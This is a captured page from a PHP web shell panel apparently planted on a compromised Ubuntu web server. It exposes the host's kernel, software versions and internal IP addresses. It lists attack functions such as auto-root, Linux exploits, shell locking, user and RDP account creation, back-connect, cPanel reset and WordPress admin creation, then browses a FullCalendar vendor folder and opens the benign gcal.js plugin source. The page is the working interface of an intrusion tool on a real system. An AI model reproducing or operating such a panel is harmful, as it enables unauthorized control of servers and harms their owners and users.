Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
admins /
vendor /
fullcalendar /
[ HOME SHELL ]
Name
Size
Permission
Action
demos
[ DIR ]
drwxr-x--x
lang
[ DIR ]
drwxr-x--x
lib
[ DIR ]
drwxr-x--x
changelog.txt
23.61
KB
-rwxr-x--x
fullcalendar.css
11.74
KB
-rwxr-x--x
fullcalendar.js
181.66
KB
-rwxr-x--x
fullcalendar.min.js
55.45
KB
-rwxr-x--x
fullcalendar.print.css
700
B
-rwxr-x--x
gcal.js
2.39
KB
-rwxr-x--x
lang-all.js
100.3
KB
-rwxr-x--x
license.txt
1.05
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gcal.js
/*! * FullCalendar v2.0.3 Google Calendar Plugin * Docs & License: http://arshaw.com/fullcalendar/ * (c) 2013 Adam Shaw */ (function(factory) { if (typeof define === 'function' && define.amd) { define([ 'jquery' ], factory); } else { factory(jQuery); } })(function($) { var fc = $.fullCalendar; var applyAll = fc.applyAll; fc.sourceNormalizers.push(function(sourceOptions) { if (sourceOptions.dataType == 'gcal' || sourceOptions.dataType === undefined && (sourceOptions.url || '').match(/^(http|https):\/\/www.google.com\/calendar\/feeds\//)) { sourceOptions.dataType = 'gcal'; if (sourceOptions.editable === undefined) { sourceOptions.editable = false; } } }); fc.sourceFetchers.push(function(sourceOptions, start, end, timezone) { if (sourceOptions.dataType == 'gcal') { return transformOptions(sourceOptions, start, end, timezone); } }); function transformOptions(sourceOptions, start, end, timezone) { var success = sourceOptions.success; var data = $.extend({}, sourceOptions.data || {}, { singleevents: true, 'max-results': 9999 }); return $.extend({}, sourceOptions, { url: sourceOptions.url.replace(/\/basic$/, '/full') + '?alt=json-in-script&callback=?', dataType: 'jsonp', data: data, timezoneParam: 'ctz', startParam: 'start-min', endParam: 'start-max', success: function(data) { var events = []; if (data.feed.entry) { $.each(data.feed.entry, function(i, entry) { var url; $.each(entry.link, function(i, link) { if (link.type == 'text/html') { url = link.href; if (timezone && timezone != 'local') { url += (url.indexOf('?') == -1 ? '?' : '&') + 'ctz=' + encodeURIComponent(timezone); } } }); events.push({ id: entry.gCal$uid.value, title: entry.title.$t, start: entry.gd$when[0].startTime, end: entry.gd$when[0].endTime, url: url, location: entry.gd$where[0].valueString, description: entry.content.$t }); }); } var args = [events].concat(Array.prototype.slice.call(arguments, 1)); var res = applyAll(success, this, args); if ($.isArray(res)) { return res; } return events; } }); } // legacy fc.gcalFeed = function(url, sourceOptions) { return $.extend({}, sourceOptions, { url: url, dataType: 'gcal' }); }; });
Close